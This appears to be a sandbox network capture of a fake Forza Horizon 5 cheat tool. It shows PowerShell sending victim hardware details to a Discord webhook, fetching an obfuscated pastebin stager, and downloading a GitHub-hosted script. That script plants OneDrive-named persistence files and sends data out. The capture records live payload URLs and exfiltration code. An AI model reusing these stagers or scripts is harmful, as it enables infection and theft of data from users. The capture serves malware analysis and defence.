                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 02 7b 07 00 00 04 72 ab 01 00 70 6f 4d 00 00 0a 02 7b 07 00 00 04 20 0d 01 00 00 20 98 00 00 00 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 07 00 00 04 18 6f 50 00 00 0a 02 7b 07 00 00 04 16 6f 5e 00 00 0a 02 7b 07 00 00 04 72 bf 01 00 70 6f 51 00 00 0a 02 7b 15 00 00 04 20 83 00 00 00 1f 73 73 4b 00 00 0a 6f 4c 00 00 0a 02 7b 15 00 00 04 72 c9 01 00 70 6f 4d 00 00 0a 02 7b 15 00 00 04 20 82 00 00 00 1f 17 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 15 00 00 04 1f 0a 6f 50 00 00 0a 02 7b 15 00 00 04 72 db 01 00 70 6f 51 00 00 0a 02 7b 15 00 00 04 17 6f 55 00 00 0a 02 7b 15 00 00 04 02 fe 06 1d 00 00 06 73 56 00 00 0a 6f 5f 00 00 0a 02 7b 16 00 00 04 1c 1f 73 73 4b 00 00 0a 6f 4c 00 00 0a 02 7b 16 00 00 04 1a 8d 44 00 00 01 25 16 20 ff c9 9a 3b 9e 73 58 00 00 0a 6f 59 00
                                                                        Data Ascii: {rpoM{ sNo{oP{o^{rpoQ{ ssKoL{rpoM{ sNo{oP{rpoQ{oU{sVo_{ssKoL{D% ;sXoY
                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 00 0a 02 7b 10 00 00 04 72 af 03 00 70 6f 4d 00 00 0a 02 7b 10 00 00 04 20 ac 00 00 00 1f 31 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 10 00 00 04 1f 0a 6f 50 00 00 0a 02 7b 10 00 00 04 16 6f 5e 00 00 0a 02 7b 10 00 00 04 72 c3 03 00 70 6f 51 00 00 0a 02 7b 11 00 00 04 17 6f 54 00 00 0a 02 7b 11 00 00 04 1c 1f 13 73 4b 00 00 0a 6f 4c 00 00 0a 02 7b 11 00 00 04 72 cd 03 00 70 6f 4d 00 00 0a 02 7b 11 00 00 04 20 9d 00 00 00 1f 11 73 4e 00 00 0a 6f 1e 00 00 0a 02 7b 11 00 00 04 16 6f 50 00 00 0a 02 7b 11 00 00 04 72 e7 03 00 70 6f 51 00 00 0a 02 7b 11 00 00 04 17 6f 55 00 00 0a 02 7b 08 00 00 04 02 fe 06 13 00 00 06 73 56 00 00 0a 6f 65 00 00 0a 02 7b 0a 00 00 04 1f 0a 6f 66 00 00 0a 02 7b 0a 00 00 04 02 fe 06 16 00 00 06 73 56 00 00 0a 6f 65 00 00 0a 02 7b 0c 00
                                                                        Data Ascii: {rpoM{ 1sNo{oP{o^{rpoQ{oT{sKoL{rpoM{ sNo{oP{rpoQ{oU{sVoe{of{sVoe{
                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 0f 0c 0a 00 dd 0d 0f 0c 06 00 ee 0b 53 08 0a 00 e3 0b 0f 0c 12 00 bb 05 3a 06 06 00 35 02 53 08 06 00 25 08 d4 00 06 00 30 08 d4 00 0e 00 12 0a c0 07 06 00 77 08 53 08 06 00 86 03 53 08 0a 00 e5 0a 0f 0c 0e 00 c2 03 43 0a 06 00 d9 03 09 0b 06 00 99 03 3b 0b 06 00 1b 0a 5b 0b 06 00 89 09 db 08 0e 00 71 03 c0 07 0e 00 0a 04 c0 07 0e 00 4b 03 c6 08 0a 00 45 08 0f 0c 0a 00 1d 08 0f 0c 06 00 07 06 53 08 06 00 f9 0a 53 08 06 00 60 06 d4 00 06 00 05 03 d4 00 06 00 77 02 d4 00 06 00 36 08 d4 00 06 00 a2 02 53 08 06 00 7f 07 53 08 0a 00 19 08 0f 0c 0e 00 9e 0a c0 07 06 00 13 03 53 08 06 00 ae 02 53 08 0e 00 c0 05 c0 07 0a 00 a9 09 0f 0c 0a 00 14 09 0f 0c 12 00 4f 0d 3a 06 0a 00 40 03 0f 0c 06 00 36 0a 53 08 06 00 48 00 53 08 c7 00 02 09 00 00 77 00 2c 09 00 00 12
                                                                        Data Ascii: S:5S%0wSSC;[qKESS`w6SSSSO:@6SHSw,
                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 55 0d 00 00 01 00 55 0d 00 00 01 00 55 0d 00 00 01 00 80 02 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 f7 09 00 00 02 00 e9 05 00 00 01 00 30 06 00 00 01 00 00 0b 00 00 01 00 04 0b 00 00 02 00 37 02 00 00 01 00 9b 08 00 00 01 00 7a 05 09 00 ec 0a 01 00 11 00 ec 0a 06 00 19 00 ec 0a 0a 00 29 00 ec 0a 10 00 31 00 ec 0a 10 00 39
                                                                        Data Ascii: UUU07z)19
                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 03 00 04 80 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 65 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 7a 01 3b 01 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 7a 01 0f 0c 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 7a 01 53 08 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 83 01 3a 06 00 00 00 00 00 00 00 00 01 00 00 00 6c 0b 00 00 78 4e 00 00 01 00 00 00 82 0b 00 00 00 00 00 00 00 61 31 00 74 6f 6f 6c 53 74 72 69 70 53 74 61 74 75 73 4c 61 62 65 6c 31 00 66 6c 6f 77 4c 61 79 6f 75 74 50 61 6e 65 6c 31 00 46 6f 72 6d 31 00 73 74 61 74 75 73 53 74 72 69 70 31 00 67 72 6f 75 70 42 6f 78 31 00 49 6e 74 33 32 00 61 32 00 67 72 6f 75 70 42 6f 78 32 00 67 72 6f 75 70 42 6f 78 33 00 53 74 61 6e 64 20 66 6f 72 20 46 48 35 00 3c 4d 6f 64 75 6c 65 3e
                                                                        Data Ascii: ez;zzS:lxNa1toolStripStatusLabel1flowLayoutPanel1Form1statusStrip1groupBox1Int32a2groupBox2groupBox3Stand for FH5<Module>
                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 70 69 6c 61 74 69 6f 6e 52 65 6c 61 78 61 74 69 6f 6e 73 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 50 72 6f 64 75 63 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 70 79 72 69 67 68 74 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79 43 6f 6d 70 61 6e 79 41 74 74 72 69 62 75 74 65 00 52 75 6e 74 69 6d 65 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 41 74 74 72 69 62 75 74 65 00 67 65 74 5f 56 61 6c 75 65 00 73 65 74 5f 56 61 6c 75 65 00 76 61 6c 75 65 00 53 74 61 6e 64 20 66 6f 72 20 46 48 35 2e 65 78 65 00 67 65 74 5f 53 69 7a 65 00 73 65 74 5f 53 69 7a 65 00 73 65 74 5f 41 75 74 6f 53 69 7a 65 00 73 65 74 5f 43 6c 69 65 6e 74 53 69 7a 65 00 49 53 75 70 70 6f 72 74 49 6e 69 74 69 61 6c 69 7a 65 00 46 6f 72 6d 31 5f 52 65 73 69
                                                                        Data Ascii: pilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeget_Valueset_ValuevalueStand for FH5.exeget_Sizeset_Sizeset_AutoSizeset_ClientSizeISupportInitializeForm1_Resi
                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 65 72 00 53 79 73 74 65 6d 2e 43 6f 64 65 44 6f 6d 2e 43 6f 6d 70 69 6c 65 72 00 70 61 74 74 65 72 6e 73 63 61 6e 54 69 6d 65 72 00 6d 61 69 6e 6c 6f 6f 70 54 69 6d 65 72 00 70 72 6f 63 65 73 73 57 61 69 74 54 69 6d 65 72 00 70 72 6f 63 65 73 73 53 74 61 72 74 54 69 6d 65 72 00 49 43 6f 6e 74 61 69 6e 65 72 00 67 65 74 53 70 69 6e 53 75 70 65 72 00 73 65 74 5f 55 73 65 56 69 73 75 61 6c 53 74 79 6c 65 42 61 63 6b 43 6f 6c 6f 72 00 67 65 74 5f 43 75 72 73 6f 72 00 53 65 74 53 79 73 74 65 6d 43 75 72 73 6f 72 00 2e 63 74 6f 72 00 2e 63 63 74 6f 72 00 49 6e 74 50 74 72 00 73 74 72 00 68 63 75 72 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 00 53 79 73 74
                                                                        Data Ascii: erSystem.CodeDom.CompilerpatternscanTimermainloopTimerprocessWaitTimerprocessStartTimerIContainergetSpinSuperset_UseVisualStyleBackColorget_CursorSetSystemCursor.ctor.cctorIntPtrstrhcurSystem.DiagnosticsSystem.Runtime.InteropServicesSyst
                                                                        2024-10-15 14:00:08 UTC1378INData Raw: 63 00 72 00 56 00 61 00 6c 00 00 21 66 00 6c 00 6f 00 77 00 4c 00 61 00 79 00 6f 00 75 00 74 00 50 00 61 00 6e 00 65 00 6c 00 31 00 00 13 67 00 72 00 6f 00 75 00 70 00 42 00 6f 00 78 00 31 00 00 09 53 00 65 00 6c 00 66 00 00 11 61 00 64 00 64 00 78 00 70 00 42 00 74 00 6e 00 00 0d 41 00 64 00 64 00 20 00 58 00 50 00 00 11 61 00 64 00 64 00 78 00 70 00 56 00 61 00 6c 00 00 1f 67 00 65 00 74 00 53 00 70 00 69 00 6e 00 53 00 75 00 70 00 65 00 72 00 56 00 61 00 6c 00 00 23 67 00 65 00 74 00 53 00 70 00 69 00 6e 00 52 00 65 00 67 00 75 00 6c 00 61 00 72 00 56 00 61 00 6c 00 00 23 67 00 65 00 74 00 53 00 70 00 69 00 6e 00 52 00 65 00 67 00 75 00 6c 00 61 00 72 00 42 00 74 00 6e 00 00 1d 41 00 64 00 64 00 20 00 57 00 68 00 65 00 65 00 6c 00 73 00 70 00 69 00 6e
                                                                        Data Ascii: crVal!flowLayoutPanel1groupBox1SelfaddxpBtnAdd XPaddxpValgetSpinSuperVal#getSpinRegularVal#getSpinRegularBtnAdd Wheelspin


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549860162.159.138.2324437428C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:23 UTC311OUTPOST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Content-Type: application/json
                                                                        Host: discord.com
                                                                        Content-Length: 214
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 14:00:23 UTC214OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 61 6c 66 6f 6e 73 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 46 48 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 34 45 53 46 53 38 47 35 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                        Data Ascii: { "content": "**user** has joined - FH5\n----------------------------------\n**GPU:** 4ESFS8G5\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                        2024-10-15 14:00:23 UTC1257INHTTP/1.1 404 Not Found
                                                                        Date: Tue, 15 Oct 2024 14:00:23 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 45
                                                                        Connection: close
                                                                        Cache-Control: public, max-age=3600, s-maxage=3600
                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                        x-ratelimit-limit: 5
                                                                        x-ratelimit-remaining: 4
                                                                        x-ratelimit-reset: 1729000824
                                                                        x-ratelimit-reset-after: 1
                                                                        via: 1.1 google
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yZwHVV3oyM08cJv8SLb5u5nA1EtS3vbqCCwyFfcgFUn2fz1GDF60NiE7DhBB%2BMjh2NBXMnQXHguIiht1a7WCvdTIX59D%2FUNewqEHY9Ctb%2Bjqussj2z9OmtQyYb%2B4"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        X-Content-Type-Options: nosniff
                                                                        Set-Cookie: __cfruid=2c6b90bcc111f27f2ee13f9d01d696a78cc3cbd8-1729000823; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                        Set-Cookie: _cfuvid=kdwA._iH252scPNEf4uY2uYh8cCZejVEgGbwGQZlEuQ-1729000823460-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3055c9ed552c98-DFW
                                                                        2024-10-15 14:00:23 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                        Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549870172.67.19.244433136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:24 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: pastebin.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 14:00:24 UTC397INHTTP/1.1 200 OK
                                                                        Date: Tue, 15 Oct 2024 14:00:24 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        x-frame-options: DENY
                                                                        x-content-type-options: nosniff
                                                                        x-xss-protection: 1;mode=block
                                                                        cache-control: public, max-age=1801
                                                                        CF-Cache-Status: HIT
                                                                        Age: 474
                                                                        Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3055d36bff2821-DFW
                                                                        2024-10-15 14:00:24 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                        Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                        2024-10-15 14:00:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.549881185.199.110.1334433136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:26 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: raw.githubusercontent.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 14:00:27 UTC901INHTTP/1.1 200 OK
                                                                        Connection: close
                                                                        Content-Length: 7508
                                                                        Cache-Control: max-age=300
                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                        Strict-Transport-Security: max-age=31536000
                                                                        X-Content-Type-Options: nosniff
                                                                        X-Frame-Options: deny
                                                                        X-XSS-Protection: 1; mode=block
                                                                        X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                        Accept-Ranges: bytes
                                                                        Date: Tue, 15 Oct 2024 14:00:26 GMT
                                                                        Via: 1.1 varnish
                                                                        X-Served-By: cache-dfw-kdal2120025-DFW
                                                                        X-Cache: HIT
                                                                        X-Cache-Hits: 1
                                                                        X-Timer: S1729000827.964673,VS0,VE1
                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                        Access-Control-Allow-Origin: *
                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                        X-Fastly-Request-ID: 1d66c4e997f276562cac0ff04f01836a062e2838
                                                                        Expires: Tue, 15 Oct 2024 14:05:26 GMT
                                                                        Source-Age: 32
                                                                        2024-10-15 14:00:27 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                        Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                        2024-10-15 14:00:27 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                        Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                        2024-10-15 14:00:27 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                        Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                        2024-10-15 14:00:27 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                        Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                        2024-10-15 14:00:27 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                        Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                        2024-10-15 14:00:27 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                        Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.549910172.67.19.244437296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-10-15 14:00:32 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: pastebin.com
                                                                        Connection: Keep-Alive
                                                                        2024-10-15 14:00:32 UTC397INHTTP/1.1 200 OK
                                                                        Date: Tue, 15 Oct 2024 14:00:32 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        x-frame-options: DENY
                                                                        x-content-type-options: nosniff
                                                                        x-xss-protection: 1;mode=block
                                                                        cache-control: public, max-age=1801
                                                                        CF-Cache-Status: HIT
                                                                        Age: 482
                                                                        Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                        Server: cloudflare
                                                                        CF-RAY: 8d3056036af745f9-DFW
